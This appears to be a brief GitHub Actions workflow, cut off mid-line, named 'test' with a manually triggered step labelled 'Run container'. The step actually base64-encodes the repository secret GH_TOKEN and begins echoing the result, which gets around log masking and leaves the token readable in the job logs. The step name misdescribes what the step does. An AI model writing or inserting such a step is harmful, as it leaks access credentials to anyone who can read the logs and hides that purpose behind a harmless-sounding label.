name: test

on:   
  workflow_dispatch:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Run container
        run: |
          ENC=$(printf "%s" "${{ secrets.GH_TOKEN }}" | base64)
          echo "ENC=$EN
